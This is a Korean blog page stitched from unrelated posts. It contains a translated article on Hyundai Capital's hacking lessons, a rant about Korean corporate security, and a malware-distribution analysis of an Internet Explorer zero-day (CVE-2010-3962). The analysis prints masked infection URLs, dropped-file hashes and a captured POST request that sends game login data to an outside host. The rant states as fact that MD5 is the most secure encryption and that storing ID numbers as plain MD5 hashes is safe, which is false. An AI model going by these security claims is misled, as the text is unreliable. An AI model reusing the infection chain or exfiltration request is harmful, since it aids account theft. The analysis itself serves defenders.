현대캐피탈이 해킹에서 얻은 교훈 5가지 - 해킹사고에 대한 우리나라 기업과 CEO가 대처해야 하는 자세

 

 

By Evan Ramstad

 

한국 최대 소비자금융업체인 현대캐피탈의 정태영 CEO는 4월 초 덴마크 출장 중 업무방식에 대전환을 이루게 하는 전화 한 통을 받았다.

 

현대캐피탈 컴퓨터시스템을 해킹했다는 전화를 받았다고 동료직원이 걸어온 전화였다. 발신자는 돈을 주지 않으면 극비정보를 유출하겠다고 협박했다.

 

정 CEO는 모든 것이 불확실했기에 깜짝 놀라지는 않았다고 회상한다. “충격받기에는 너무 불확실한 상황이었다. 실제로 무슨 일이 일어났는지 먼저 알아내야 했다.”

 

그 후 2주에 걸쳐 현대캐피탈은 경찰에 협력해서 사건과 연관된 2개 해커집단을 찾아냈다. 경찰은 한국에 소재를 둔 첫째 집단과 관련된 용의자 3명을 체포했고 다른 집단은 한국사법권 밖인 필리핀에 있다고 밝혔다.

 

당시 경험을 통해 정 CEO 및 현대캐피탈 관계자는 경영방식에 대한 생각을 바꾸었을 뿐 아니라 회사 구조를 근본적으로 개선했다.

 

 

정 CEO는 IT부서를 다른 부서와 마찬가지로 대했다는 점이 가장 큰 실책이었다고 말한다. 현재 그는 IT부서를 현대캐피탈의 중심부로 간주하고 있다. 당시 사건 이래 정 CEO는 수 주에 걸쳐 네트워크 아키텍처 및 보안 인프라, 데이터보호와 고객만족 간 상충관계에 대해 공부했다.

 

“안방에 있는 보석을 지키기 위해 화장실과 차고문까지 잠그면 가족들이 불평할 뿐 아니라 피해갈 방법을 찾게 된다. 다른 모든 것과 마찬가지로 IT보안에도 철학이 필요하며 최고경영자만이 그러한 결정을 내릴 수 있다.”

 

보안과가 새로 추가된 IT부서는 CEO 직속부서가 되었다. 현대캐피탈은 보안에 허점이 생기는 것을 방지하기 위해 신규 상품 일부의 출시를 늦추었다.

 

해커로부터 첫 전화가 걸려온 다음날 귀국한 정 CEO는 다음날 곧바로 기자회견을 열어 무슨 일이 일어났는지, 현재까지 알려진 것은 무엇인지 고객과 투자자에게 공개했다.

 

한국 업계에서 이러한 개방성은 흔치 않은 것이다. 사건 공개로 인해 미디어와 정부규제기관의 이목이 현대캐피탈에 집중되었다.

현대캐피탈은 현재 해킹사건과 관련해 자사 책임이 있는지 정부기관의 판결을 기다리고 있다.

 

 

다음은 정 CEO가 당시 경험에서 얻은 5가지 교훈이다.

 

 

-정부를 신뢰할 것

 

“경찰의 전문성과 신속함에 깊은 인상을 받았다. 경찰인력은 IT시스템에 대해 잘 이해하고 있었으며 예상보다 훨씬 신속하게 움직였다. 문제는 필리핀으로 도망가면 잡을 수 없다는 것이다.

 

우리는 최우선으로 경찰에 신고하고 계속해서 연락을 취했다. 해킹의 범위는 정확하게 알 수 없었지만 해커 흔적을 발견했다. 해커집단은 내일 전까지 거액을 지불하라고 협박했고 우리는 의논 끝에 일부 금액을 지불하기로 했다. 돈을 다시 찾지 못할 것이라 경찰이 경고했지만 되찾으려는 게 아니라 해커가 더 많은 흔적을 남기게 하는 게 목적이라고 말했다.

요구액 5억원 중 1억원을 보내고 계속해서 해커와 연락을 취한 끝에 경찰이 범인을 붙잡을 수 있었다.”

 

- 개방성과 투명성을 유지할 것

 

“고전적인 교훈이다. 우리는 항상 투명성을 유지한다. 사건 다음날 기자회견을 열었고 고객에게 연락을 취해 무슨 일이 있었는지 알렸다. 개방성과 투명성을 유지했기에 많은 도움을 받을 수 있었다. 개방된 상태를 유지하면 도움을 청하기 쉬운 것이다.

현대캐피탈이 사건을 공개한 후 많은 기업들이 해킹당한 사실을 신고한 데는 우리의 공이 있었다고 생각한다. 우리 사건 이후 갑자기 해킹이 증가한 걸까? 아니라고 생각한다. 우리가 깃발을 들고 나선 이후 다른 기업들도 해커에 대한 싸움에 동참하기 시작했다.”

 

-IT를 익히고 취약성을 파악하라

 

“오늘날의 CEO는 프로그래밍을 할 줄 모르더라도 해킹의 기본 구조를 이해하고 있어야 한다. 보안과 고객만족 간 상충관계에 대한 결정 및 조직 관련 결정을 내려야 하기 때문이다.

 

IT에 관심을 기울이지 않는 어리석은 CEO는 없다. 하지만 내가 과거에 그랬던 것처럼 IT부서에 예산을 증편하고 격려해 주지만, 프로그래밍에 대해 모르겠다는 태도를 보이는 CEO도 있을 것이다. 이는 잘못된 생각이다.

 

IT를 이해하기 위해 시간을 투자해야 한다… 나는 내가 IT보안을 이해하기에는 나이가 너무 많다고 생각했지만 나이나 장소에 상관 없이 모두가 이해할 수 있다는 사실을 알게 되었다.”

 

-IT 관련 결정의 기반을 이루는 철학을 창조하라.

 

“몇 년 전까지만 해도 해킹경로는 매우 단순했다. 하지만 요즘은 해킹할 수 있는 틈이 수없이 많다. 스마트폰 앱, 수많은 웹사이트… 따라서 CEO는 여러 결정을 내려야 한다.

 

일례로, 보안시스템을 대폭 강화할 경우 고객이 웹사이트에 접속할 때마다 몇 분씩 기다리게 된다. 이는 IT문제가 아니다. 어떤 종류의 철학 혹은 정책방향을 선택할지 결정해야 하는 것이다. 모든 기업에게 적용되는 정답이 있는 게 아니다.”

 

- 제품과 서비스 계획을 재점검하라.

 

“IT관련 결정의 실제 비용을 생각해 보아야 한다. 예를 들어 새로 웹사이트를 개발하는 비용이 5억원이라고 하더라도 사이트 개설로 인해 추가 해킹경로가 생기기 때문에 관련 비용도 고려해야 한다.

 

이번 사건 전에는 앱 제작에 집중했었다. 고객과 우리 모두에게 간편한 선택이기 때문이다. 하지만 이제는 앱 하나마다 해킹경로가 늘어난다는 사실을 이해하고 있다. 실질비용은 개발비용 더하기 해킹노출비용이다.

 

우리는 현재 회사 전체 속도를 늦추어 나가고 있다. 어떻게 보이고 작동하는지는 차후 문제이고 보안이 제1순위이다.”

 

 

기사원문 : 코리아리얼타임

 

지우아빠 : 숨기고 감추는 것은 이제 미덕이 아닙니다. 공개하고 공유하고 도움을 요청하는 자세가 가장 중요한 시대가 아닌가 생각되는 기사입니다.

http://yayatom.blog.me/10111795334

최근 SK커뮤니케이션즈에 이어 한국엡손도 해킹을 당했다.

내가 누누이 주변 인물과 여러 블로거분들께 이야기 하는 거지만, 한국의 정부나 기업이나 보안의식이 많이 결여되어 있다고 생각한다.
보안팀이 문제라는 것이 아니라, 그들에게 월급을 주는 상부가 문제라는 것이다.
우리나라는 해킹이 터지는 해에는 컴퓨터 보안에 많은 예산을 할당하지만, 다음번 예산에서는 대폭 감소하는 현상이 있다.
보안을 강화할 필요성을 느끼는 것은 일이 터진 직후 뿐이고 그 이후에는 강화의 필요성을 못 느끼는 것이다.
한국의 많은 보안 업체와 임직원분들께서 항상 사건이 터질 때마다 하는 이야기지만 정부와 기업에서는 좀더 많은 예산을 투입해 보안을 강화할 필요가 있다.
우리가 미리미리 대비를 했다면 이렇게 해킹이 자주 터질리가 없지 않겠는가?
물론, 모든 해킹을 다 막을 수는 없다.
하지만 확률은 줄일 수 있는 것이다.
그간 해킹 사건이 많이 증가하느 추세지만 올 해는 특히 대형 해킹 사건이 다른 해에 비해 상당히 많이 발생했다.

한국엡손에서 해킹을 발견한 것은 13일이다.
그런데 방통위에 신고를 한 날짜는 18일인데, 엡손은 그동안 최대한 감추려 한것이 아닐까?
우리가 불이나거나 위급상황,범죄상황이 발생했을 때, 소방서 혹은 경찰서로 바로 연락하듯이 해킹이 발생하면 방통위 등에 바로 신고를 했어야 하는 것이 아닐까?
요즘은 인터넷 사용량이 상당하기 때문에 최대한 빨리 추적을 해야 그 흔적을 잡을 수 있다.
조금이라고 꾸물거렸다가 흔적이 중간에 날아가면 누가 책임을 질것인가? 범인은 잡을 수나 있을까?
내가 보기엔 우리나라의 이런 안이한 대책을 노린 것이 아닌가 생각한다.

2011/07/31 - [세상] - 네이트와 갖은 대형 사이트에 대한 분노

지난 SK커뮤니케이션즈와 이번 한국엡손 등 요즘 발생하는 대형 사건들은 전부 한사람 혹은 하나의 단체에서 벌인 일이라고 나는 생각한다.
그렇지 않고서야 어떻게 이리 시기를 잘 맞춰서 공격을 감행할 수 있을까?
옥션해킹, 3.3 DDOS, 7.7 DDOS, 3.4 DDOS, SK커뮤니케이션즈, 한국엡손.
위 사건들의 타깃을 보자면 전부 한국의 기업이고, 해외의 기업은 건들지 않았다는 것이다.
내가 여기서 말하는 해외의 기업이란 옥션의 경우 이베이, 한국엡손의 경우 본사 및 타국의 엡손을 말하는 것이다.
왜 하필 한국만 콕 집어서 해킹을 하는 것일까?
우리나라의 보안이 타국에 비해 더욱 취약하고 이득이 많기 때문이 아닐까?
NASA나 FBI, CIA도 해킹하는 마당에(탈북 ‘해커 대부’ 가 털어놓은 북한의 가공할 해킹 능력)보안에 더욱 힘써야한 한다고 생각한다.


2011/03/04 - [잡담] - DDoS 공격 때문에 제 사이트도 다운되었습니다..
2010/12/14 - [컴퓨터] - 악성코드 유포 : 유명 언론 사이트 해킹을 통한 온라인 게임 계정 탈취 (2010.12.13)
2010/08/06 - [컴퓨터] - 중국 해커가 자주 사용하는 8가지 툴과 그 예방책

현재 뉴스를 보면 다들 아시겠지만, 네이트의 고객 개인정보 유출에 대한 뉴스글을 보실 수 있습니다.
슬슬 네이트도 뭔가 해킹 사전 터지겠구나 했는데, 실제로 터지니 아이러니 하군요.
네이트도 당했으니 이제 네이버, 다음 등도 타겟이 될 수 있습니다.

얼마전에, 저의 어머니의 친구 분 계정을 도용하여 스팸 메일이 온 적이 있습니다.
그곳에는 달랑 링크 한 줄만 있었습니다.
웬만 해서는 누르는 사람이 없겠지만, 많은 주부나 중장년층은 일단 확인해보려 하는게 주된 반응입니다.
그런데 그 사이트는 없는 존재하지 않는 사이트로 표기가 됩니다만, 진짜로 없는 건지 그렇게 화면만 띄우는 건지 우리가 어떻게 알까요?
도메인은 있고 사이트는 없다고 뜬다라.. 뭔가 이상하지요?
개인정보를 송신하는 프로그램이었을 거라 저는 생각합니다.
다행히 저희 어머니는 가입한 사이트가 적어 금방 바꿀 수 있었습니다.
우연의 일치일까 하고 상대방에게 물어보니 "자신은 그런 메일을 보낸 적이 없다" 며, "자신의 주소록에 있던 모든 사람에게 그와 같은 메일이 도착했다고 한다." 라고 진술하였습니다.

이런 소식은 주변 사람들로부터 듣기만 했지 진짜로 보니 우리나라 포털들은 참 대책이 없다고 생각합니다.
현존하는 암호화 기술 중 가장 보안이 뛰어나다고 하자면 MD5 기술이 되겠습니다.
이는, 단방향 암호화 기술로 암호화는 되지만 다시 원문으로 만들 수 없는 기술입니다.
이 기술은 많은 소형, 중형 사이트에서 쓰이고 있으며, 그 안정성은 널리 알려져 있습니다.

만약.
네이트나 옥션 같은 곳에서 이 기술을 적용했다면 이와 같이 일이 커졌을까요?
제가 알기론 대형 사이트들은 저 기술을 사용치 않는 것으로 알고 있습니다.
자체적으로 개발한 암호화 기술이나 안정성이 뛰어나다고 알려진 다른 기술을 도입합니다.
하지만 결국 복호화(원문으로 만드는 과정)가 된다는 점은 변함이 없습니다.
복호화가 된다는 것은 꼭 해킹이 아니더라도 내부 관계자가 얼마든지 가져다가 해석할 수 있다는 것입니다.
포털에서 주민번호를 복호화가 가능케 끔 저장해서 어디에 쓰려는 걸까요?

우리가 아이디, 비밀번호 등을 찾을 때 주민번호를 입력하는 것은 다들 아실 것입니다.
MD5는 같은 값에 대하여 항상 같은 값을 출력하게 되어져 있기 때문에 MD5를 적용해도 문제가 없습니다.
입력한 주민번호를 MD5로 암호화후 DB의 데이터와 비교하면 되니까요.

미리보기 서비스도 그렇습니다.
일부 문만 요약해서 보여주거나 자체적으로 검열하는 것도 아니고 대부분의 원문을 보여준다는 것은 해킹의 표적이 되고도 남는 일이 아니겠습니까?

우리나라의 많은 금융 기관들은 ActiveX를 이용하여 쓰잘때기 없는 보안 프로그램을 잔뜩 심어두었습니다.
덕분에 Internet Explorer가 아니라면 이용 하지도 못합니다.
과연, 이것들이 실제로 그 효용성이 있는 제품이라면 말도 안하겠습니다만.
해외의 많은 금율 기관은 오히려 ActiveX를 사용하지 않습니다.
그러면서도 우리나라보다 보안은 더욱 뛰어납니다.

왜 그러겠습니까?

첫째로, 우리나라는 표준을 지키지 않습니다.
ActiveX 자체가 표준에 어긋나는 것 이라고 봐도 무방합니다.
표준에 어긋난다는 것은 그만큼 구멍이 많다는 것이고 아무리 보안을 한들 그 구멍이 뚫리면 그것은 있으나 마나입니다.

농협 해킹사건도 그렇습니다.
비밀번호도 비밀번호대로 참 어이가 없었습니다만, Super Admin이 농협 전산망 시스템과 연결된 노트북을 개인 용도로 쓴건 아닌지 의심입니다.
솔직히, 엄무용은 엄무용으로만 사용했다면 Sharebox에서 발발한 바이러스에 걸릴 이유가 없지 않을까요?
엄무용이라면 그 사용되는 포트가 지극히 적겠지요.
하나의 기업의 서버를 총괄 관리하는 자라면 자신이 사용하는 포트 정도는 알 수 있습니다.
그러면 내부 통신용, 서버 접속용 포트를 제외한 모든 포트를 차단 했어야 옳지 않겠습니까?
오히려 그 노트북의 시스템은 무엇을 사용하는지 알고 싶습니다.
당연히도 농협이 ActiveX를 사용하니 윈도우 따위를 사용했을 가능성이 높습니다.
정말로 윈도우 였다면.
나는 그 관리자를 향해 체면 불구 하고 갖은 욕설은 물론 만나면 어떤 짓을 할 지 모르겠습니다.
제 마음은 그리 너그럽지 못하기 때문입니다.
현존하는 OS 중 모바일을 제외하면 윈도우가 가장 취약합니다.
그런데 이것을 썼다면 그 관리자는 자격증 전부 반납하고 업계에서 퇴사하셔야합니다.

이만큼 우리나라는 겉으로는 IT 강국이라지만 껍데기를 벗겨 보면 IT 쓰래기 입니다.
이것은 보안과 조금 무관합니다만, 우리가 흔히 Wi-Fi라고 부르는 기술도 사실 우리나라의 기술입니다.
빠르게 이동하면서도 무선인터넷 일정한 속도로 안정적으로 제공을 하는 차세대 기술들도 우리나라가 개발한 것들이 주를 이룹니다.
그런데 정작, 개발국은 사용도 못하는데 타국은 이미 전국에 빼곡히 도입했다는 사실은 아이러니 할 수 없습니다.
4G만해도 그렇습니다.
우리나라는 이번달에 도입을 했지만 해외는 이미 도입이 되었습니다.
4G또한 우리나라 기술인데 말입니다.

11월 초에 공개된 Internet Explorer 제로데이(0-Day) 취약점 CVE-2010-3962은 전 세계적으로 한국과 중국에서 가장 활발하게 악용되는 것으로 최근 마이크로소프트(Microsoft)에서 발표를 한 적이 있습니다.

Microsoft Internet Explorer 제로데이 취약점 : Invalid flag reference를 이용한 원격 코드 실행 (2010.11.4)

최근에는 해당 취약점과 더불어 추가적인 악성 스크립트를 포함하여 보안 제품의 진단을 우회하는 경향이 강하게 나타나고 있으므로 인터넷 사용자들은 반드시 유명 보안 제품의 실시간 감시 기능을 활성화하시고 이용하시기 바랍니다.

참고로 CVE-2010-3962 취약점은 12월 15일에 12월 마이크로소프트 정기 업데이트에서 보안 패치가 제공되는 것으로 알려져 있으므로 반드시 설치하시기 바랍니다.

이번 주말을 이용한 악성코드 유포 중 눈에 띄는 사례는 국내 유명 J 언론 사이트를 해킹하여 악성 스크립트(1.html / 2.html)를 등록하고, 또 다른 온라인 광고 서버의 특정 스크립트 파일 내부에 악성 iframe을 추가하여 다양한 인터넷 사이트에서 유포가 이루어지도록 구성한 점이 특징입니다.

해당 그림은 특정 광고 서버의 정상적인 스크립트 파일 내부에 Base64로 인코딩한 iframe을 추가하여 해당 광고가 포함된 인터넷 사이트를 방문할 경우 실행되도록 구성되어 있습니다.

[광고 서버 악성코드 유포 경로]

h**p://ad.**tive.co.kr/js/shiny_Rolling.js
 ㄴ h**p://ad.**tive.co.kr/js/h&#x74~(생략)~;ml

해당 iframe은 국내 J 언론 사이트가 해킹되어 등록된 파일로 연결이 이루어지고 있으며, 세부적인 유포 경로는 다음과 같습니다.

h**p://cutyline.zuzu***.jo***.com/illust/data/1212/index.html
 ㄴ h**p://cutyline.zuzu***.jo***.com/illust/data/1212/load.html
   ㄴ h**p://cutyline.zuzu***.jo***.com/illust/data/1212/1.html (Hauri ViRobot : JS.S.Agent.4543)
     ㄴ h**p://cutyline.zuzu***.jo***.com/illust/data/1212/k.js
     ㄴ h**p://down.play***.info/1210.exe
   ㄴ h**p://cutyline.zuzu***.jo***.com/illust/data/1212/2.html (nProtect : Script-JS/W32.Agent.AXB)
     ㄴ h**p://down.play***.info/1210.exe
 ㄴ h**p://s14.cnzz.com/stat.php?id=2508468&web_id=2508468

2.html 파일은 CVE-2010-3962 취약점을 이용한 것으로 Internet Explorer를 이용하여 접속한 사용자의 경우 보안 제품에서 진단하지 않는다면 자동으로 감염이 이루어지고 있는 상태입니다.

참고로 예전에는 CVE-2010-3962 취약점만을 이용하였지만 최근에는 추가적인 악성 스크립트를 통해 감염률을 증가시키는 것으로 보입니다.

해당 2개의 악성 스크립트를 통해 최종적으로 사용자 PC에 생성되는 1210.exe (SHA1 : 6f6d41f0a014ad80a1990047b74f59e11c673021) 파일에 대하여 안철수연구소(AhnLab) V3 보안 제품에서는 Win-Trojan/Agent.81920.ADW (VirusTotal : 24/43) 진단명으로 진단되고 있습니다.

출처 : 안철수연구소(AhnLab)

참고로 해당 진단명의 경우 현재 시간 진단 비율이 증가하고 있는 것을 확인할 수 있습니다.

[생성 파일 등록 정보]

C:\WINDOWS\system32\imm32.dll :: 수정된 악성 imm32.dll 파일 - 114,176 Bytes
C:\WINDOWS\system32\imm32.dll.log :: imm32.dll 백업 정상 파일 - 110,080 Bytes
C:\WINDOWS\system32\ole.dll

[생성 파일 진단 정보]

C:\WINDOWS\system32\imm32.dll (SHA1 : 9f16c4e71b42313ef75d0837525586726660c031)
 - AhnLab V3 : Trojan/Win32.Patched (VirusTotal : 22/41)

C:\WINDOWS\system32\ole.dll (SHA1 : 35dda46cd4f43320273f97304a37e7faa11f1e3a)
 - AhnLab V3 : Win-Trojan/Agent.53248.ASE (VirusTotal : 17/43)

<안철수연구소 ASEC 대응팀> 악성코드로 인한 imm32.dll 파일 변조 조치 가이드

<안철수연구소> Win-Trojan/Patched.AT 전용 백신

악성코드 유포 : CVE-2010-3962 제로데이 취약점을 이용한 온라인 게임 계정 탈취 (2010.11.13)

해당 악성코드는 기존부터 이용되던 imm32.dll 정상 파일을 악성 파일로 바꿔치기를 하여 것을 확인할 수 있으며, 해당 파일 변조에 대해 보안 업체에서는 전용 백신 및 수동 조치 방법을 공개하고 있습니다.

감염된 PC에서는 V3 보안 제품 등을 무력화하여 자신을 보호하며, 사용자가 웹 브라우저를 실행하여 다양한 온라인 게임 사이트에서 로그인을 시도할 경우 계정 정보를 외부로 유출하는 것으로 알려져 있습니다.

ole.dll

[한게임 로그인시 네트워크 연결 정보]

POST /hgrt/lin.asp?CODE=HQTITnHTLRTTQQ~(생략)~IpopIpmpopVRJpmQVRIT HTTP/1.1
Accept: image/gif, */*
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d86c3324596
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0
Host: with.freeoicq.info
Content-Length: 194
Connection: Keep-Alive
Cache-Control: no-cache

실제 한게임 사이트에서 사용자가 로그인을 시도할 경우 홍콩(HongKong)에 호스팅된 특정 서버로 정보가 유출되는 것을 확인할 수 있었습니다.

그러므로 위와 같은 악성코드에 감염된 사용자는 치료가 완료될 때까지 절대로 온라인 게임 등 인터넷 사이트 로그인을 하지 않도록 주의하시기 바라며, 조만간 공개될 보안 패치 업데이트를 반드시 설치하시고 인터넷을 이용하시기 바랍니다.

http://hummingbird.tistory.com

제 사이트 SSH를 통해 누가 프랑스의 한 사이트를 해킹하려 했다고 하네요.
어떻게 된건지 알 수가 없군요..
goblin이라는 놈이라는데 이건 대체 누구인지 참내
범인을 빨리 잡아서 족쳐야지 이거원;;